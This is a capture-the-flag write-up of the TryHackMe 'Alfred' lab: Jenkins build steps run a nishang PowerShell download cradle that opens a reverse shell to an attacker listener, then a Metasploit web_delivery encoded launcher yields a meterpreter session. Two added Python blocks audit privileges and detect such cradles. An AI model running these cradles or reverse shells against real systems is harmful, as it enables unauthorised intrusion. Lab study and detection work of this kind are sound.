writeup TryHackMe Alfred

To
5 min read · Apr 2, 2021

Tags: nishang, jenkins, pentesting, tryhackme
Attack surface: file upload
Core target: get nishang onto the target machine and execute it, then switch to a Metasploit shell.

Summary:
- Jenkins can execute commands on the worker machine (the target).
- The attacker provides the file-download infrastructure (a web server and a listener).
- nishang is a mature toolkit for working with Windows PowerShell.

Steps:
- nmap scan to gather basic info and find the web services
- Jenkins runs on ip:port
- guess the username and password
- configure a Jenkins build step to run a command
- start the file-download infrastructure
- set the PowerShell security level
- execute nishang and gather target-machine info
- find user.txt

Scan:

$ nmap -sC -sV -oN initial ip_address
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-02 01:24 EDT
Nmap scan report for ip_address
Host is up (0.26s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Site doesn't have a title (text/html).
3389/tcp open ssl/ms-wbt-server?
| ssl-cert: Subject: commonName=alfred
| Not valid before: 2021-04-01T03:47:29
|_Not valid after: 2021-10-01T03:47:29
|_ssl-date: 2021-04-02T05:25:21+00:00; -1s from scanner time.
8080/tcp open http Jetty 9.4.z-SNAPSHOT
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
|_http-title: Site doesn't have a title (text/html;charset=utf-8).
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: -1s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 54.93 seconds

HTTP server A runs on port 80 (a static website); HTTP server B runs on port 8080 (the Jenkins service). Go directly to ip:8080/job/project/configure.

In the Build box, write the script (update the script here), then Save and Apply. First test script:

whoami

New script:

powershell iex (New-Object Net.WebClient).DownloadString('http://<yourwebserver>/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress [IP] -Port [PortNo.]

Back on the attacker (infrastructure) machine:

You first need to download the PowerShell script and make it available for the target to download. You can do this by starting an HTTP server with Python: python3 -m http.server

wget https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1
python3 -m http.server
nc -lnvp 4444

Back in Jenkins, click Build Now:

PS C:\Users> gci -recurse -filter "user.txt"

    Directory: C:\Users\bruce\Desktop

Mode                LastWriteTime     Length Name
----                -------------     ------ ----
-a---        10/25/2019  11:22 PM         32 user.txt

PS C:\Users> type C:\Users\bruce\Desktop\user.txt
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
PS C:\Users>

Switching shell: payload

PS C:\Program Files (x86)\Jenkins\workspace\project> whoami /priv

PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
=============================== ========================================= ========
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeSecurityPrivilege Manage auditing and security log Disabled
SeTakeOwnershipPrivilege Take ownership of files or other objects Disabled
SeLoadDriverPrivilege Load and unload device drivers Disabled
SeSystemProfilePrivilege Profile system performance Disabled
SeSystemtimePrivilege Change the system time Disabled
SeProfileSingleProcessPrivilege Profile single process Disabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Disabled
SeCreatePagefilePrivilege Create a pagefile Disabled
SeBackupPrivilege Back up files and directories Disabled
SeRestorePrivilege Restore files and directories Disabled
SeShutdownPrivilege Shut down the system Disabled
SeDebugPrivilege Debug programs Enabled
SeSystemEnvironmentPrivilege Modify firmware environment values Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Disabled
SeUndockPrivilege Remove computer from docking station Disabled
SeManageVolumePrivilege Perform volume maintenance tasks Disabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
SeCreateSymbolicLinkPrivilege Create symbolic links Disabled
PS C:\Program Files (x86)\Jenkins\workspace\project>
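As an added defensive example (not part of this writeup), the following Python parses `whoami /priv` output in the table format shown above and reports which high-risk privileges are Enabled for the account the Jenkins build runs as. The HIGH_RISK set is my own selection, and the sample table is constructed from the output above.

```python
"""Audit `whoami /priv` output for enabled high-risk privileges."""
import re

# Privileges that warrant review when Enabled on a CI/build account.
# The set is an assumption of this example, not a Windows-defined list.
HIGH_RISK = {
    "SeDebugPrivilege": "attach to and read other processes",
    "SeImpersonatePrivilege": "impersonate clients after authentication",
    "SeTakeOwnershipPrivilege": "take ownership of any securable object",
    "SeBackupPrivilege": "read files regardless of ACL",
    "SeRestorePrivilege": "write files regardless of ACL",
    "SeLoadDriverPrivilege": "load kernel drivers",
}

# One table row: "<SeXxxPrivilege> <description words> <Enabled|Disabled>"
ROW_RE = re.compile(r"^(Se\w+Privilege)\s+.+?\s+(Enabled|Disabled)\s*$")

def parse_whoami_priv(text):
    """Return {privilege: state} for every row of a `whoami /priv` table."""
    privs = {}
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if m:
            privs[m.group(1)] = m.group(2)
    return privs

def enabled_high_risk(privs):
    """Sorted (privilege, reason) pairs for high-risk entries that are Enabled."""
    return sorted((name, HIGH_RISK[name]) for name, state in privs.items()
                  if state == "Enabled" and name in HIGH_RISK)

# Constructed sample, taken from the shape of the output above.
SAMPLE = """PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
=============================== ========================================= ========
SeSecurityPrivilege Manage auditing and security log Disabled
SeDebugPrivilege Debug programs Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeLoadDriverPrivilege Load and unload device drivers Disabled
"""

if __name__ == "__main__":
    for name, why in enabled_high_risk(parse_whoami_priv(SAMPLE)):
        print(f"{name}: {why}")
```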

Switching

Using the official one, it will hang; the Jenkins task finishes successfully. So I used two writeups:

https://www.aldeid.com/wiki/TryHackMe-Alfred#.5BTask_2.5D_Switching_Shells

They both use exploit/multi/script/web_delivery.

Set PAYLOAD, LPORT, LHOST and the target, then generate the command:


msf6 exploit(multi/script/web_delivery) > show options
Module options (exploit/multi/script/web_delivery):

Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.9.213.205 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:

Id Name
-- ----
2 PSH
msf6 exploit(multi/script/web_delivery) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/script/web_delivery) >
[*] Started reverse TCP handler on 10.9.213.205:4444
[*] Using URL: http://0.0.0.0:8080/Z3smQp
[*] Local IP: http://10.9.213.205:8080/Z3smQp
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -e WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAA9AFsATgBlAHQALgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsAFQAeQBwAGUAXQA6...

Paste the command, from powershell.exe to the end, into the Jenkins build step, then Build Now.
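Both build-step payloads on this page (the nishang WebClient cradle earlier and the web_delivery encoded launch just above) leave a recognisable trace in a Jenkins job configuration or console log. As an added defensive example that is not from the writeup or from Metasploit, this Python scans build-step command lines for those two shapes and decodes any -EncodedCommand argument for review; the sample steps and the placeholder URL are constructed here.

```python
"""Flag PowerShell download cradles and encoded launches in build steps."""
import base64
import re

# Pieces of a WebClient download cradle fed to Invoke-Expression (iex).
IEX_RE = re.compile(r"\b(?:iex|invoke-expression)\b", re.IGNORECASE)
WEBCLIENT_RE = re.compile(r"new-object\s+(?:system\.)?net\.webclient", re.IGNORECASE)
DOWNLOAD_RE = re.compile(r"\.downloadstring\s*\(", re.IGNORECASE)
# powershell[.exe] ... -e/-enc/-encodedcommand <base64>, the shape web_delivery prints.
ENCODED_RE = re.compile(
    r"powershell(?:\.exe)?\b.*?-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})",
    re.IGNORECASE)
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+hidden", re.IGNORECASE)

def is_download_cradle(text):
    """True when iex, New-Object Net.WebClient and DownloadString( all appear."""
    return all(r.search(text) for r in (IEX_RE, WEBCLIENT_RE, DOWNLOAD_RE))

def decode_encoded_command(b64):
    """-EncodedCommand carries base64 of UTF-16LE text; None if it is not that."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def analyze_command(cmd):
    """Return the list of findings for one build-step command line."""
    findings = []
    if is_download_cradle(cmd):
        findings.append("download-cradle")
    m = ENCODED_RE.search(cmd)
    if m:
        findings.append("encoded-command")
        if HIDDEN_RE.search(cmd):
            findings.append("hidden-window")
        decoded = decode_encoded_command(m.group(1))
        if decoded is not None and is_download_cradle(decoded):
            findings.append("download-cradle-in-encoded")
    return findings

def scan_build_steps(steps):
    """Map each suspicious build step to its findings; clean steps are omitted."""
    return {cmd: analyze_command(cmd) for cmd in steps if analyze_command(cmd)}

# Constructed samples: two ordinary steps, the page's nishang cradle with its
# placeholder host, and an encoded launch built here around a placeholder URL.
ENCODED_SAMPLE = base64.b64encode(
    "IEX ((new-object net.webclient).downloadstring('http://ATTACKER-PLACEHOLDER/x'))"
    .encode("utf-16-le")).decode()
SAMPLE_STEPS = [
    "whoami",
    "msbuild project.sln /p:Configuration=Release",
    "powershell iex (New-Object Net.WebClient).DownloadString('http://<yourwebserver>/Invoke-PowerShellTcp.ps1')",
    "powershell.exe -nop -w hidden -e " + ENCODED_SAMPLE,
]
```

Run scan_build_steps(SAMPLE_STEPS) to see the two flagged steps; a real deployment would feed it the command lines from each job's config.xml or build console output.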

sessions

Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x86/windows alfred\bruce @ ALFRED 10.9.213.205:4444 -> 10.10.179.139:49758 (10.10.179.139)
msf6 exploit(multi/script/web_delivery) > sessions 1
[*] Starting interaction with 1...
meterpreter >
meterpreter >
meterpreter > ls
Listing: C:\Program Files (x86)\Jenkins\workspace\project
=========================================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100777/rwxrwxrwx 73802 fil 2021-04-04 01:09:01 -0400 shell.exe

nice ~

msf6 exploit(multi/script/web_delivery) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > ls
Listing: C:\Program Files (x86)\Jenkins\workspace\project
=========================================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100777/rwxrwxrwx 73802 fil 2021-04-04 01:09:01 -0400 shell.exe
meterpreter > whoami
[-] Unknown command: whoami.

Remember to use shell,

meterpreter > shell
Process 780 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Program Files (x86)\Jenkins\workspace\project>^Z
Background channel 1? [y/N] y
meterpreter > ls
Listing: C:\Program Files (x86)\Jenkins\workspace\project
=========================================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100777/rwxrwxrwx 73802 fil 2021-04-04 01:09:01 -0400 shell.exe
meterpreter >
meterpreter > load incognto
Loading extension incognto...
[-] Failed to load extension: Unable to load extension 'incognto' - module does not exist.
meterpreter > load incognito
Loading extension incognito...Success.
meterpreter > list_tokens -g
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
Call rev2self if primary process token is SYSTEM
Delegation Tokens Available
========================================

Oops. TryHackMe sometimes takes the room down. Restart.

msfconsole -q

The -q parameter means remove the launch banner, but I like the banner. hhh

What is Incognito?

Following the task, the rest is easy.
